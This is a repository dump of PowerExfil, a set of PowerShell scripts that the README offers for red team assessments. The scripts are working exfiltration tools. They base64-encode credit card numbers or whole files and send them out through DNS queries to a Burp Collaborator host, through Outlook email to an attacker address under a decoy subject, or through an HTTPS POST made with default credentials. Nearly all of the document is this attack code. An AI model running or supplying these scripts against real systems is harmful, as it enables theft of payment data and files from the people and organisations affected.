├── ExfilCards.ps1 ├── ExfilDataStreamDNS.ps1 ├── ExfilEmail.ps1 ├── ExfilHTTPS.ps1 └── README.md /ExfilCards.ps1: -------------------------------------------------------------------------------- 1 | # ExfilCards.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil credit card numbers via base64 encoded strings to a custom DNS server. 4 | # 5 | 6 | $lines = Get-Content .\exfil.txt 7 | foreach ($line in $lines.Split('\r\n')){ 8 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($line) 9 | $EncodedText =[Convert]::ToBase64String($Bytes) 10 | nslookup "$EncodedText.yourburphost.burpcollaborator.net" 11 | } -------------------------------------------------------------------------------- /ExfilDataStreamDNS.ps1: -------------------------------------------------------------------------------- 1 | # ExfilDataStreamDNS.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server. 4 | # 5 | # Update exfil.csv with the filename to exfil 6 | # Update $dnsserver var with DNS server to use 7 | # 8 | 9 | $lines = Get-Content .\exfil.csv 10 | $dnsserver = "yourhost.burpcollaborator.net" 11 | foreach ($line in $lines){ 12 | echo "Line: $line" 13 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($line) 14 | $EncodedText =[Convert]::ToBase64String($Bytes) 15 | echo "EncodedText: $EncodedText" 16 | $EncodedTextLength = $EncodedText.length 17 | echo "EncodedTextLength: $EncodedTextLength" 18 | 19 | $i = 0 20 | $pos = 0 21 | $buff = 60 22 | 23 | echo "Start ===============================================" 24 | nslookup start.$dnsserver | out-null 2> $null 25 | 26 | While ($i -le $EncodedTextLength) { 27 | $diff = $EncodedTextLength - $i 28 | if($diff -lt $buff){ 29 | $EncodedTextStream = $EncodedText.substring($i,$diff) 30 | } 31 | if($diff -gt $buff-1){ 32 | $diff_end = $buff 33 | $EncodedTextStreamSubString = $EncodedText.substring($i,$diff_end) 34 | $EncodedTextStream = $EncodedTextStreamSubString 35 | } 36 | $EncodedTextStream = $EncodedTextStream -replace '=','00' 2> $null 37 | echo "Full DNS: $EncodedTextStream.$dnsserver" 38 | nslookup "$EncodedTextStream.$dnsserver" | out-null 2> $null 39 | $i = $i+$buff 40 | } 41 | echo "End ===============================================" 42 | nslookup end.$dnsserver | out-null 2> $null 43 | } -------------------------------------------------------------------------------- /ExfilEmail.ps1: -------------------------------------------------------------------------------- 1 | # ExfilEmail.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil the entire contents of a file or given command via base64 encoded strings using email to a custom email address. 4 | # 5 | 6 | $Outlook = New-Object -ComObject Outlook.Application 7 | $Mail = $Outlook.CreateItem(0) 8 | $Mail.To = "ATTACKER_EMAIL@mailinator.com" 9 | $Mail.Subject = "Nothing to see here... " 10 | #$content = Invoke-Command {Get-Process} 11 | $content = Get-Content exfil.txt 12 | 13 | #Base64 Encoder 14 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($content) 15 | $EncodedText =[Convert]::ToBase64String($Bytes) 16 | #$EncodedText 17 | 18 | $Mail.Body = $EncodedText 19 | #attachments 20 | $file = "C:\Temp\exfil.txt" 21 | #$Mail.Attachments.Add($file); 22 | #send message 23 | $Mail.Send() 24 | #quit and cleanup 25 | #$Outlook.Quit() 26 | [System.Runtime.Interopservices.Marshal]::ReleaseComObject($Outlook) | Out-Null -------------------------------------------------------------------------------- /ExfilHTTPS.ps1: -------------------------------------------------------------------------------- 1 | # ExfilHTTPS.ps1 by @xer0dayz - https://xerosecurity.com 2 | # 3 | # This script will exfil the entire contents of a file via base64 encoded strings via HTTPS POST request to custom web server. 4 | # 5 | 6 | $content = Get-Content exfil.txt 7 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($content) 8 | $EncodedText =[Convert]::ToBase64String($Bytes) 9 | $uri = "https://yourhost.burpcollaborator.net" 10 | Invoke-RestMethod -Uri $uri -Body $content -UseDefaultCredentials -Method Post -ContentType "multipart/form-data" 11 | #Invoke-RestMethod -Uri $uri -Body $EncodedText -UseDefaultCredentials -Method Post -ContentType "multipart/form-data" -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # PowerExfil 2 | ## A collection of custom data exfiltration scripts for Red Team assessments. 3 | * ExfilCards.ps1 - This script will exfil credit card numbers via base64 encoded strings to a custom DNS server. 4 | * ExfilDataStreamDNS.ps1 - This script will exfil the entire contents of a file via base64 encoded strings to a custom DNS server. 5 | * ExfilEmail.ps1 - This script will exfil the entire contents of a file or given command via base64 encoded strings using email to a custom email address. 6 | * ExfilHTTPS.ps1 - This script will exfil the entire contents of a file via base64 encoded strings via HTTPS POST request to custom web server. 7 | 8 | ### NOTE: These scripts are provided "as is" for educational purposes only. --------------------------------------------------------------------------------